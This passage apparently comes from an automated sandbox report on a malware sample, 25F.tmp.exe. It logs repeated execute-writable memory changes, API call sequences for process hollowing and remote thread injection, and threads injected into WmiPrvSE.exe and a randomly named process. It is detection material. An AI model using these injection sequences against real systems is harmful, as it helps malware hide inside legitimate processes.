            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 8A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 8E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 410000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 140000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 160000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 140000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Contains functionality to inject code into remote processes
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_00609014 LoadLibraryA,LoadLibraryA,CreateProcessA,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_00609014
            Contains functionality to inject threads in other processes
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_003642E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,4_2_003642E0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_004042E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,4_2_004042E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 9_2_003D42E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,9_2_003D42E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 10_2_001842E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,10_2_001842E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 11_2_003842E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,11_2_003842E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 12_2_004142E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,12_2_004142E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 13_2_001B42E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,13_2_001B42E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 14_2_003542E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,14_2_003542E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 15_2_003142E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,15_2_003142E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 16_2_003842E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,16_2_003842E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 17_2_001042E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,17_2_001042E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 18_2_001042E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,18_2_001042E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 19_2_002242E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,19_2_002242E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 20_2_003242E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,20_2_003242E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 21_2_005142E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,21_2_005142E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 22_2_001942E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,22_2_001942E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 23_2_008442E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,23_2_008442E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 25_2_004042E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,25_2_004042E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 26_2_008242E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,26_2_008242E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 27_2_000942E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,27_2_000942E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 29_2_005D42E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,29_2_005D42E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 30_2_000942E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,30_2_000942E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 31_2_009142E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,31_2_009142E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 32_2_003942E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,32_2_003942E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 33_2_000942E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,33_2_000942E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 34_2_002242E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,34_2_002242E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 35_2_001542E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,35_2_001542E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 36_2_007F42E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,36_2_007F42E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 37_2_002542E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,37_2_002542E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 38_2_002642E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,38_2_002642E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 39_2_003F42E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,39_2_003F42E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 40_2_003F42E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,40_2_003F42E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 41_2_002842E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,41_2_002842E0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 42_2_001042E0 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,CloseHandle,42_2_001042E0
            Creates a thread in another existing process (thread injection)
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe EIP: C55C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 3D5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 185C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 385C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 415C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 1B5C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 355C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 315C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 385C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 105C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 105C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 225C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 325C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 515C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 195C50Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeThread created: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe EIP: 845C50Jump to behavior
